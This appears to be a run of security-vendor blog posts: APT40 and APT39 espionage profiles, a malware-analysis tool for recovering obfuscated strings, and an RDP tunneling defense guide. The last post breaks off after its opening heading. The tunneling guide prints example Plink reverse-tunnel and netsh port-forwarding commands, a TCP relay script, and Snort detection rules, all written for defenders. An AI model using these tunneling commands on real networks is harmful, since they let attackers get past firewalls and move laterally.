In addition to its maritime focus, APT40 engages in broader regional targeting against traditional intelligence targets, especially organizations with operations in Southeast Asia or involved in South China Sea disputes. Most recently, this has included victims with connections to elections in Southeast Asia, which is likely driven by events affecting China’s Belt and Road Initiative. China’s “One Belt, One Road” (一带一路) or “Belt and Road Initiative” (BRI) is a $1 trillion USD endeavor to build land and maritime trade routes across Asia, Europe, the Middle East, and Africa to develop a trade network that will project China’s influence across the greater region.


Figure 1: Countries and industries targeted. Countries include the United States, United Kingdom, Norway, Germany, Saudi Arabia, Cambodia and Indonesia

Attribution

We assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The actor’s targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China. Analysis of the operational times of the group’s activities indicates that it is probably centered around China Standard Time (UTC +8). In addition, multiple APT40 command and control (C2) domains were initially registered by China-based domain resellers and had Whois records with Chinese location information, suggesting a China-based infrastructure procurement process.

APT40 has also used multiple Internet Protocol (IP) addresses located in China to conduct its operations. In one instance, a log file recovered from an open indexed server revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines. All of the logins to this C2 were from computers configured with Chinese language settings.

Attack Lifecycle

Initial Compromise

APT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises.

  • APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement.
  • The operation’s spear-phishing emails typically leverage malicious attachments, although Google Drive links have also been observed.
  • APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure. Observed vulnerabilities include:


Figure 2: APT40 attack lifecycle

Establish Foothold

APT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection.

  • First-stage backdoors such as AIRBREAK, FRESHAIR, and BEACON are used before downloading other payloads.
  • PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
  • APT40 will often target VPN and remote desktop credentials to establish a foothold in a targeted environment. This methodology is ideal for the group because, once these credentials are obtained, it may not need to rely as heavily on malware to continue the mission.

Escalate Privileges

APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes.

  • APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors.
  • Additionally, the Windows Sysinternals ProcDump utility and Windows Credential Editor (WCE) are believed to be used during intrusions as well.

Internal Reconnaissance

APT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance. The group also leverages RDP, SSH, legitimate software within the victim environment, an array of native Windows capabilities, publicly available tools, as well as custom scripts to facilitate internal reconnaissance.

  • APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration.
  • APT40 frequently uses native Windows commands, such as net.exe, to conduct internal reconnaissance of a victim’s environment.
  • Web shells are heavily relied on for nearly all stages of the attack lifecycle. Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups.

Lateral Movement

APT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP). For each new system compromised, the group usually executes malware, performs additional reconnaissance, and steals data.

  • APT40 also uses native Windows utilities such as at.exe (a task scheduler) and net.exe (a network resources management tool) for lateral movement.
  • Publicly available tunneling tools are leveraged alongside distinct malware unique to the operation.
  • Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement.
  • APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services.

Maintain Presence

APT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment. These tools enable continued control of key systems in the targeted network.

  • APT40 strongly favors web shells for maintaining presence, especially publicly available tools.
  • Tools used during the Establish Foothold phase also continue to be used in the Maintain Presence phase; this includes AIRBREAK and PHOTO.
  • Some APT40 malware tools can evade typical network detection by leveraging legitimate websites, such as GitHub, Google, and Pastebin, for initial C2 communications.
  • Common TCP ports 80 and 443 are used to blend in with routine network traffic.

Complete Mission

Completing missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft.

Outlook and Implications

Despite increased public attention, APT40 continues to conduct cyber espionage operations following a regular tempo, and we anticipate their operations will continue through at least the near and medium term. Based on APT40’s broadening into election-related targets in 2017, we assess with moderate confidence that the group’s future targeting will affect additional sectors beyond maritime, driven by events such as China’s Belt and Road Initiative. In particular, as individual Belt and Road projects unfold, we are likely to see continued APT40 activity against the project’s regional opponents.

FLARE Script Series: Recovering Stackstrings Using Emulation with ironstrings

This blog post continues our Script Series where the FireEye Labs Advanced Reverse Engineering (FLARE) team shares tools to aid the malware analysis community. Today, we release ironstrings: a new IDAPython script to recover stackstrings from malware. The script leverages code emulation to overcome this common string obfuscation technique. More precisely, it makes use of our flare-emu tool, which combines IDA Pro and the Unicorn emulation engine. In this blog post, I explain how our new script uses flare-emu to recover stackstrings from malware. In addition, I discuss flare-emu’s event hooks and how you can use them to easily adapt the tool to your own analysis needs.

Introduction

Analyzing strings in binary files is an important part of malware analysis. Although simple, this reverse engineering technique can provide valuable information about a program’s use and its capabilities. This includes indicators of compromise like file paths and domain names. Especially during advanced analysis, strings are essential to understand a disassembled program’s functionality. Malware authors know this, and string obfuscation is one of the most common anti-analysis techniques reverse engineers encounter.

Due to the prevalence of obfuscated strings, the FLARE team has already developed and shared various tools and techniques to deal with them. In 2014, we published an IDA Pro plugin to automate the recovery of constructed strings in malware. In 2016, we released FLOSS, a standalone open-source tool to automatically identify and decode strings in malware.

Both solutions rely on vivisect, a Python-based program analysis and emulation framework. Although vivisect is a robust tool, it may fail to completely analyze an executable file or emulate its code correctly. And just like any tool, vivisect is susceptible to anti-analysis techniques. With missing, incomplete, or erroneous processing by vivisect, dependent tools cannot provide the best results. Moreover, vivisect does not provide an easy-to-use graphical interface to interactively change and enhance program analysis.

I encountered all these shortcomings recently, when I analyzed a GandCrab ransomware sample (version 5.0.4, SHA256 hash: 72CB1061A10353051DA6241343A7479F73CB81044019EC9A9DB72C41D3B3A2C7). The malware contains various anti-analysis techniques to hinder disassembly and control-flow analysis. Before I could perform any efficient reverse engineering in IDA Pro, I had to overcome these hurdles. I used IDAPython to remove various anti-analysis instruction patterns which then allowed the disassembler to successfully identify all functions in the binary. Many of the recovered functions contained obfuscated strings. Unfortunately, my changes did not propagate to vivisect, because it performs its own independent analysis on the original binary. Consequently, vivisect still failed to recognize most functions correctly and I couldn’t use one of our existing solutions to recover the obfuscated strings.

While I could have tried to feed my patches in IDA Pro back to vivisect or to create a modified binary, I instead created a new IDAPython script that does not depend on vivisect, thus circumventing the mentioned shortcomings. It uses IDA Pro’s program analysis and Unicorn’s emulation engine. The easy integration of these two tools is powered by flare-emu.

Using IDA Pro instead of vivisect resolves multiple limitations of our previous implementations. Now changes that users make in their IDB file, e.g. by patching instructions to manually enhance analysis, are immediately available during emulation. Moreover, the tool more robustly supports different architectures including x86, AMD64, and ARM.

Stackstrings: An Example

The disassembly listing in Figure 1 shows an example string obfuscation from the sample I analyzed. The malware creates a string at run-time by moving each character into adjacent stack addresses (gray highlights). Finally, the sample passes the string’s starting offset as an argument to the InternetOpen API call (blue highlight). Manually following these memory moves and restoring strings by hand is a very cumbersome process, especially if the malware complicates value assignments using additional instructions, as illustrated below.


Figure 1: Disassembly listing showing stackstring creation and usage

Because malware often uses stack memory to create such strings, Jay Smith coined the term stackstrings for this anti-analysis technique. Note that malware can also construct strings in global memory. Our new script handles both cases; strings constructed on the stack and in global memory.

ironstrings: Stackstring Recovery Using flare-emu

The new IDAPython script is an evolution of our existing solutions. It combines FLOSS’s stackstring recovery algorithm and functionality from our IDA Pro plugin. The script relies on IDA Pro’s program analysis and emulates code using Unicorn. The combination of both tools is powered by flare-emu. Fe, short for flare-emu, is the chemical symbol for iron, and hence the script is named ironstrings.

To recover stackstrings, ironstrings enumerates all disassembled functions in a program except for library and thunk functions as identified by IDA Pro. For each function, the script emulates various code paths through the function and searches for stackstrings based on two heuristics:

  1. Before all call instructions in the function, as stackstrings are often constructed and then passed to other functions, e.g., Windows APIs like CreateFile or InternetOpenUrl.
  2. At the end of a basic block containing more than five memory writes. The number of memory writes is configurable. This heuristic is helpful if the same memory buffer is used multiple times in a function and if the string construction spans multiple basic blocks.

If any of these conditions apply, the script searches the function’s current stack frame for printable ASCII and UTF-16 strings. To detect strings in global memory, the script additionally searches for strings in all memory locations that have been written to.
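The string-scanning step itself can be illustrated with a small standalone function. The snippet below is a simplified stand-in, not the actual ironstrings code, that pulls printable ASCII and UTF-16LE strings out of a captured memory buffer such as an emulated stack frame.

```python
# Simplified stand-in for the string-extraction step: scan a memory buffer
# (e.g., an emulated stack frame) for printable ASCII and UTF-16LE strings.
# Not the actual ironstrings implementation.
import re

MIN_LEN = 4
ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)

def extract_strings(buf):
    strings = [m.group().decode("ascii") for m in ASCII_RE.finditer(buf)]
    strings += [m.group().decode("utf-16le") for m in UTF16_RE.finditer(buf)]
    return strings

# Example: the kind of residue a stackstring construction leaves behind.
stack_frame = (b"\x00\x01wininet.dll\x00\x00"
               b"I\x00n\x00t\x00e\x00r\x00n\x00e\x00t\x00\x00\x00")
print(extract_strings(stack_frame))  # ['wininet.dll', 'Internet']
```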

Using flare-emu Hooks to Recover Stackstrings

If you’re not already familiar with flare-emu, I recommend reading our previous blog post. It discusses some of the interfaces the tool provides. Other helpful resources are the examples and the project documentation available on the flare-emu GitHub.

The stackstrings script uses flare-emu’s iterateAllPaths API. The function iterates multiple code paths through a function. It first finds possible paths from function start to function end. The tool then forces the emulation down all identified code paths independent from the actual program state. This extensive code coverage allows ironstrings to recover strings constructed from many different emulation runs.

A key feature of flare-emu is its set of hook functions that get triggered by different emulation events. These hooks, or callbacks, enable the development of very powerful automation tasks. The available hooks are a combination of Unicorn’s standard hooks, e.g., to hook memory access events, and multiple convenience hooks provided by flare-emu. The following section briefly describes the available callbacks in flare-emu and illustrates how the ironstrings script uses them to recover obfuscated strings.

  • instructionHook: This Unicorn standard hook is triggered before an instruction is emulated. ironstrings uses this hook to initiate the stackstrings extraction if a basic block contained enough memory writes, for example.
  • memAccessHook: This Unicorn standard hook is triggered when memory read or write events occur during emulation. In the stackstrings script this function stores data about all memory writes.
  • callHook: This flare-emu hook is activated before each function call. The hook’s return value is ignored. In the stackstrings script this hook triggers the extraction of stackstrings.
  • preEmuCallback: This flare-emu hook is called before each emulation run. It is only available in the iterate and the iterateAllPaths functions. The hook’s return value is ignored. ironstrings does not use this hook.
  • targetCallback: This flare-emu hook gets called whenever one of the specified target addresses is hit. It is only available in the iterate and the iterateAllPaths functions. The hook’s return value is ignored. The stackstrings script does not use this hook.

The code in Figure 2 shows the callback functions that flare-emu’s API currently supports, their signatures, and examples of how to use them. All callbacks receive an argument named hookData. This dictionary allows the user to provide application-specific data to use before, during, and after emulation. In user-defined callbacks this dictionary is often named userData, as in the examples below, due to its naming in Unicorn. ironstrings uses it to access function analysis data and store recovered strings across its various hooks. The dictionary also provides access to the EmuHelper object and emulation metadata.


Figure 2: flare-emu example hook implementations
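
In the spirit of Figure 2, the sketch below shows how these hooks could be wired together with flare-emu to approximate the workflow described above. The callback signatures and keyword arguments mirror the flare-emu documentation at the time of writing and should be verified against the current README; recover_strings and is_end_of_block are placeholders for the string-recovery and basic-block logic, not real flare-emu or ironstrings functions.

import idc
import flare_emu

def call_hook(address, arguments, function_name, user_data):
    # Heuristic 1: before every call instruction, scan the current stack frame for strings
    user_data["strings"].update(recover_strings(user_data))        # recover_strings is a placeholder

def instruction_hook(uc, address, size, user_data):
    # Heuristic 2: at the end of a basic block with enough memory writes, scan again
    if is_end_of_block(address) and user_data["mem_writes"] > 5:   # is_end_of_block is a placeholder
        user_data["strings"].update(recover_strings(user_data))
        user_data["mem_writes"] = 0

def mem_access_hook(uc, access_type, mem_address, mem_size, mem_value, user_data):
    # Record every memory write so global (non-stack) buffers can be scanned as well
    user_data["written"].add(mem_address)
    user_data["mem_writes"] += 1

eh = flare_emu.EmuHelper()
hook_data = {"strings": set(), "written": set(), "mem_writes": 0}
fva = idc.get_func_attr(idc.here(), idc.FUNCATTR_START)            # function under the cursor
eh.iterateAllPaths(fva, lambda *args: None,                        # target callback unused here
                   callHook=call_hook,
                   instructionHook=instruction_hook,
                   memAccessHook=mem_access_hook,
                   hookData=hook_data)
print(sorted(hook_data["strings"]))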

Installation

Download and install flare-emu as described on its GitHub installation page. ironstrings is available, along with our other IDA Pro plugins and scripts, at our ironstrings GitHub page.

Note that both flare-emu and ironstrings were written using the new IDAPython API available in IDA Pro 7.0 and higher. They are not backwards compatible with previous program versions.

Usage and Options

To run the script in IDA Pro, go to File – Script File... (ALT+F7) and select ironstrings.py. The script runs automatically on all functions, prints its results to IDA Pro's output window, and adds comments at the locations where it recovered stackstrings. Figure 3 shows the script’s output of the recovered stackstring locations from the GandCrab sample. Analysis of this malware takes the script about 15 seconds.


Figure 3: Deobfuscated stackstrings and locations where they were identified

Figure 4 shows the disassembly listing of the stackstring creation example discussed at the beginning of this post after running ironstrings.


Figure 4: Commented stackstring after running ironstrings

After analyzing a sample, the script provides a summary and a unique listing of all recovered strings. The output for the ransomware sample is shown in Figure 5. Here the tool failed to analyze two functions due to invalid memory operations during Unicorn’s code emulation.


Figure 5: Script summary and unique string listing

Note that you can modify various options to change the script’s behavior. For example, you can configure the output format at the top of the ironstrings.py file. The script’s README file explains the options in more detail.

Conclusion

This blog post explains how our new IDAPython script ironstrings works and how you can use it to automatically recover stackstrings in IDA Pro. Overcoming anti-analysis techniques is just one of many useful applications of code emulation for malware analysis. This post shows that flare-emu provides the ideal base for this by integrating IDA Pro and Unicorn. The detailed discussion of flare-emu’s hook functions will help you to write your own powerful automation scripts. Please reach out to us with questions, suggestions and feedback via the flare-emu and flare-ida GitHub issue trackers.

APT39: An Iranian Cyber Espionage Group Focused on Personal Information

UPDATE (Jan. 30): Figure 1 has been updated to more accurately reflect APT39 targeting. Specifically, Australia, Norway and South Korea have been removed.

In December 2018, FireEye identified APT39 as an Iranian cyber espionage group responsible for widespread theft of personal information. We have tracked activity linked to this group since November 2014 in order to protect organizations from APT39 activity to date. APT39’s focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks, which have been linked to influence operations, disruptive attacks, and other threats. APT39 likely focuses on personal information to support monitoring, tracking, or surveillance operations that serve Iran’s national priorities, or potentially to create additional accesses and vectors to facilitate future campaigns. 

APT39 was created to bring together previous activities and methods used by this actor, and its activities largely align with a group publicly referred to as "Chafer." However, there are differences in what has been publicly reported due to the variances in how organizations track activity. APT39 primarily leverages the SEAWEED and CACHEMONEY backdoors along with a specific variant of the POWBAT backdoor. While APT39's targeting scope is global, its activities are concentrated in the Middle East. APT39 has prioritized the telecommunications sector, with additional targeting of the travel industry and IT firms that support it and the high-tech industry. The countries and industries targeted by APT39 are depicted in Figure 1.


Figure 1: Countries and industries targeted by APT39

Operational Intent

APT39's focus on the telecommunications and travel industries suggests intent to perform monitoring, tracking, or surveillance operations against specific individuals; to collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities; or to create additional accesses and vectors to facilitate future campaigns. The targeting of government entities suggests a potential secondary intent to collect geopolitical data that may benefit nation-state decision making. Targeting data supports the belief that APT39's key mission is to track or monitor targets of interest, collect personal information, including travel itineraries, and gather customer data from telecommunications firms.

Iran Nexus Indicators

We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East, infrastructure, timing, and similarities to APT34, a group that loosely aligns with activity publicly reported as “OilRig”. While APT39 and APT34 share some similarities, including malware distribution methods, POWBAT backdoor use, infrastructure nomenclature, and targeting overlaps, we consider APT39 to be distinct from APT34 given its use of a different POWBAT variant. It is possible that these groups work together or share resources at some level.

Attack Lifecycle

APT39 uses a variety of custom and publicly available malware and tools at all stages of the attack lifecycle.

Initial Compromise

For initial compromise, FireEye Intelligence has observed APT39 leverage spear phishing emails with malicious attachments and/or hyperlinks typically resulting in a POWBAT infection. APT39 frequently registers and leverages domains that masquerade as legitimate web services and organizations that are relevant to the intended target. Furthermore, this group has routinely identified and exploited vulnerable web servers of targeted organizations to install web shells, such as ANTAK and ASPXSPY, and used stolen legitimate credentials to compromise externally facing Outlook Web Access (OWA) resources.

Establish Foothold, Escalate Privileges, and Internal Reconnaissance

Post-compromise, APT39 leverages custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT to establish a foothold in a target environment. During privilege escalation, freely available tools such as Mimikatz and Ncrack have been observed, in addition to legitimate tools such as Windows Credential Editor and ProcDump. Internal reconnaissance has been performed using custom scripts and both freely available and custom tools such as the port scanner, BLUETORCH.

Lateral Movement, Maintain Presence, and Complete Mission

APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip.


Figure 2: APT39 attack lifecycle

There are some indications that APT39 demonstrates a penchant for operational security designed to bypass detection efforts by network defenders. In one case, the group used a modified version of Mimikatz that was repacked to thwart anti-virus detection; in another, after gaining initial access, APT39 performed credential harvesting outside of the compromised entity's environment to avoid detection.

Outlook

We believe APT39's significant targeting of the telecommunications and travel industries reflects efforts to collect personal information on targets of interest and customer data for the purposes of surveillance to facilitate future operations. Telecommunications firms are attractive targets given that they store large amounts of personal and customer information, provide access to critical infrastructure used for communications, and enable access to a wide range of potential targets across multiple verticals. APT39's targeting not only represents a threat to known targeted industries, but it extends to these organizations' clientele, which includes a wide variety of sectors and individuals on a global scale. APT39's activity showcases Iran's potential global operational reach and how it uses cyber operations as a low-cost and effective tool to facilitate the collection of key data on perceived national security threats and gain advantages against regional and global rivals.

Bypassing Network Restrictions Through RDP Tunneling

Remote Desktop Services is a component of Microsoft Windows that is used by various companies for the convenience it offers systems administrators, engineers and remote employees. On the other hand, Remote Desktop Services, and specifically the Remote Desktop Protocol (RDP), offers this same convenience to remote threat actors during targeted system compromises. When sophisticated threat actors establish a foothold and acquire ample logon credentials, they may switch from backdoors to using direct RDP sessions for remote access. When malware is removed from the equation, intrusions become increasingly difficult to detect.

RDPing Against the Rules

Threat actors continue to prefer RDP for the stability and functionality advantages over non-graphical backdoors, which can leave unwanted artifacts on a system. As a result, FireEye has observed threat actors using native Windows RDP utilities to connect laterally across systems in compromised environments. Historically, non-exposed systems protected by a firewall and NAT rules were generally considered not to be vulnerable to inbound RDP attempts; however, threat actors have increasingly started to subvert these enterprise controls with the use of network tunneling and host-based port forwarding.

Network tunneling and port forwarding take advantage of firewall "pinholes" (ports not protected by the firewall that allow an application access to a service on a host in the network protected by the firewall) to establish a connection with a remote server blocked by a firewall. Once a connection has been established to the remote server through the firewall, the connection can be used as a transport mechanism to send or "tunnel" local listening services (located inside the firewall) through the firewall, making them accessible to the remote server (located outside the firewall), as shown in Figure 1.


Figure 1: Enterprise firewall bypass using RDP and network tunneling with SSH as an example

Inbound RDP Tunneling

A common utility used to tunnel RDP sessions is PuTTY Link, commonly known as Plink. Plink can be used to establish secure shell (SSH) network connections to other systems using arbitrary source and destination ports. Since many IT environments either do not perform protocol inspection or do not block SSH communications outbound from their network, attackers such as FIN8 have used Plink to create encrypted tunnels that allow RDP ports on infected systems to communicate back to the attacker command and control (C2) server.

Example Plink Executable Command:

plink.exe <users>@<IP or domain> -pw <password> -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

Figure 2 provides an example of a successful RDP tunnel created using Plink, and Figure 3 provides an example of communications being sent through the tunnel using port forwarding from the attacker C2 server.


Figure 2: Example of successful RDP tunnel created using Plink


Figure 3: Example of successful port forwarding from the attacker C2 server to the victim

It should be noted that for an attacker to be able to RDP to a system, they must already have access to the system through other means of compromise in order to create or access the necessary tunneling utility. For example, an attacker’s initial system compromise could have been the result of a payload dropped from a phishing email aimed at establishing a foothold into the environment, while simultaneously extracting credentials to escalate privileges. RDP tunneling into a compromised environment is one of many access methods typically used by attackers to maintain their presence in an environment.

Jump Box Pivoting

Not only is RDP the perfect tool for accessing compromised systems externally, but RDP sessions can also be daisy-chained across multiple systems as a way to move laterally through an environment. FireEye has observed threat actors using the native Windows Network Shell (netsh) command to utilize RDP port forwarding as a way to access newly discovered segmented networks reachable only through an administrative jump box.

Example netsh Port Forwarding Command:

netsh interface portproxy add v4tov4 listenport=8001 listenaddress=<JUMP BOX IP> connectport=3389 connectaddress=<DESTINATION IP>

Example Shortened netsh Port Forwarding Command:

netsh I p a v l=8001 listena=<JUMP BOX IP> connectp=3389 c=<DESTINATION IP>

For example, a threat actor could configure the jump box to listen on an arbitrary port for traffic being sent from a previously compromised system. The traffic would then be forwarded directly through the jump box to any system on the segmented network using any designated port, including the default RDP port TCP 3389. This type of RDP port forwarding gives threat actors a way to utilize a jump box’s allowed network routes without disrupting legitimate administrators who are using the jump box during an ongoing RDP session. Figure 4 provides an example of RDP lateral movement to a segmented network via an administrative jump box.


Figure 4: Lateral Movement via RDP using a jump box to a segmented network
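
To illustrate conceptually what a portproxy-style forwarder does, the sketch below implements a minimal TCP relay in Python: it listens on one address and port and blindly copies bytes to and from a destination host. This is an illustration of the port forwarding technique, not a tool attributed to any threat actor, and the addresses in the usage comment are hypothetical.

import socket
import threading

def pipe(src, dst):
    # Copy bytes one way until either side closes the connection
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        src.close()
        dst.close()

def forward(listen_host, listen_port, connect_host, connect_port):
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((listen_host, listen_port))
    listener.listen(5)
    while True:
        client, _ = listener.accept()
        upstream = socket.create_connection((connect_host, connect_port))
        # Relay traffic in both directions on separate threads
        threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
        threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()

# e.g., forward("0.0.0.0", 8001, "10.0.20.15", 3389)  # hypothetical jump box relay to an RDP port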

Prevention and Detection of RDP Tunneling

If RDP is enabled, threat actors have a way to move laterally and maintain presence in the environment through tunneling or port forwarding. To mitigate vulnerability to and detect these types of RDP attacks, organizations should focus on both host-based and network-based prevention and detection mechanisms. For additional information see the FireEye blog post on establishing a baseline for remote desktop protocol.

Host-Based Prevention:

  • Remote Desktop Service: Disable the remote desktop service on all end-user workstations and systems for which the service is not required for remote connectivity.
  • Host-based Firewalls: Enable host-based firewall rules that explicitly deny inbound RDP connections.
  • Local Accounts: Prevent the use of RDP using local accounts on workstations by enabling the “Deny log on through Remote Desktop Services” security setting.

Host-Based Detection:

Registry Keys:

  • Review registry keys associated with Plink connections that can be abused for RDP session tunneling to identify unique source and destination systems. By default, both PuTTY and Plink store session information and previously connected SSH servers in the following registry keys on Windows systems:
    • HKEY_CURRENT_USER\Software\SimonTatham\PuTTY
    • HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys
  • Similarly, the creation of a PortProxy configuration with netsh is stored in the following Windows registry key:
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
  • Collecting and reviewing these registry keys can identify both legitimate SSH use and unexpected tunneling activity. Additional review may be needed to confirm the purpose of each artifact; a scripted collection sketch follows this list.
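
As a minimal triage sketch (assuming Python's built-in winreg module on the system under review), the snippet below enumerates the PuTTY host key entries and any PortProxy configuration. The exact PortProxy subkey layout (for example, a tcp subkey) can vary, so the sketch simply walks whatever subkeys exist.

import winreg

def dump_values(hive, path):
    # Enumerate all values under a registry key as (name, data) pairs
    results = []
    try:
        with winreg.OpenKey(hive, path) as key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                    results.append((name, data))
                    index += 1
                except OSError:
                    break
    except FileNotFoundError:
        pass
    return results

# Previously connected SSH servers recorded by PuTTY/Plink
for name, _ in dump_values(winreg.HKEY_CURRENT_USER, r"Software\SimonTatham\PuTTY\SshHostKeys"):
    print("PuTTY/Plink host key:", name)

# netsh portproxy configuration (walk any subkeys present under v4tov4)
base = r"SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4"
try:
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base) as key:
        for i in range(winreg.QueryInfoKey(key)[0]):
            sub = winreg.EnumKey(key, i)
            for name, data in dump_values(winreg.HKEY_LOCAL_MACHINE, base + "\\" + sub):
                print("portproxy:", sub, name, "->", data)
except FileNotFoundError:
    pass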

Event Logs:

  • Review event logs for high-fidelity logon events. Common RDP logon events are contained in the following event logs on Windows systems:
    • %systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanager%3Operational.evtx
    • %systemroot%\Windows\System32\winevt\Logs\Security.evtx
  • The “TerminalServices-LocalSessionManager” log contains successful interactive local or remote logon events (EID 21), as well as successful reconnections of previously established RDP sessions that were not terminated by a proper user logout (EID 25). The “Security” log contains successful Type 10 remote interactive (RDP) logons (EID 4624). A source IP address recorded as a localhost IP address (127.0.0.1 – 127.255.255.255) may be indicative of a tunneled logon routed from a listening localhost port to the localhost’s RDP port TCP 3389. A sketch of such a query follows this list.
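
One possible way to triage these events (a sketch, assuming the built-in wevtutil utility, Python 3.8+, and the standard EID 4624 event schema) is to pull recent logon events and flag Type 10 logons whose source address is a loopback IP:

import subprocess
import xml.etree.ElementTree as ET

# Query the most recent successful logon events (EID 4624) from the Security log
xml_out = subprocess.run(
    ["wevtutil", "qe", "Security", "/q:*[System[(EventID=4624)]]", "/f:xml", "/rd:true", "/c:500"],
    capture_output=True, text=True, check=True,
).stdout

# wevtutil emits a series of <Event> elements; wrap them in a root node before parsing
root = ET.fromstring("<Events>" + xml_out + "</Events>")

for event in root:
    fields = {d.get("Name"): (d.text or "") for d in event.iter("{*}Data")}
    # Type 10 = RemoteInteractive (RDP); a loopback source suggests a tunneled logon
    if fields.get("LogonType") == "10" and fields.get("IpAddress", "").startswith("127."):
        print(fields.get("TargetUserName"), fields.get("IpAddress"))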

Review artifacts of execution for evidence of “plink.exe” execution. Note that attackers can rename the file to avoid detection. Relevant artifacts include, but are not limited to:

  • Application Compatibility Cache/Shimcache
  • Amcache
  • Jump Lists
  • Prefetch
  • Service Events
  • CCM Recently Used Apps from the WMI repository
  • Registry keys

Network-Based Prevention:

  • Remote Connectivity: Where RDP is required for connectivity, enforce the connection to be initiated from a designated jump box or centralized management server.
  • Domain Accounts: Employ the “Deny log on through Remote Desktop Services” security setting for privileged accounts (e.g. domain administrators) and service accounts, as these types of accounts are commonly used by threat actors to laterally move to sensitive systems in an environment.

Network-Based Detection:

  • Firewall Rules: Review existing firewall rules to identify areas of vulnerability to port forwarding. In addition to the potential use of port forwarding, monitor for internal communications between workstations in the environment. Generally, workstations do not need to communicate with one another directly, and firewall rules can be used to prevent any such communication except where needed.
  • Network Traffic: Perform content inspection of network traffic. Not all traffic communicating on a given port is what it appears to be. For example, threat actors may use TCP ports 80 or 443 to establish an RDP tunnel with a remote server. Deep inspection of the network traffic can reveal that it is not actually HTTP or HTTPS, but entirely different traffic altogether. Therefore, organizations should closely monitor their network traffic.
  • Snort Rules: The main indicator of tunneled RDP occurs when the RDP handshake has a designated low source port generally used for another protocol. Figure 5 provides two sample Snort rules that can help security teams identify RDP tunneling in their network traffic by identifying designated low source ports generally used for other protocols.

alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled msts]"; dsize:<65; content:"|03 00 00|"; depth:3; content:"|e0|"; distance:2; within:1; content:"Cookie: mstshash="; distance:5; within:17; sid:1; rev:1;)

alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled]"; flow:established; content:"|c0 00|Duca"; depth:250; content:"rdpdr"; content:"cliprdr"; sid:2; rev:1;)

Figure 5: Sample Snort Rules to identify RDP tunneling

Conclusion

RDP enables IT environments to offer freedom and interoperability to users. But with more and more threat actors using RDP to move laterally across networks with limited segmentation, security teams are being challenged to distinguish between legitimate and malicious RDP traffic. Therefore, adequate host-based and network-based prevention and detection methods should be implemented to actively monitor for, and identify, malicious RDP usage.

Cryptocurrency and Blockchain Networks: Facing New Security Paradigms

On Jan. 22, FireEye participated in a panel focused on cryptocurrencies and blockchain technology during the World Economic Forum. The panel addressed issues raised in a report developed by FireEye, together with our partner Marsh & McLennan (a global professional services firm) and Circle (a global crypto finance company). The report touched on some of the security considerations around crypto-assets, today and in the future. In this blog post, we delve deeper into the security paradigms surrounding cryptocurrencies and blockchain networks.

First, some background that will provide context for this discussion.

Cryptocurrencies – A Primer

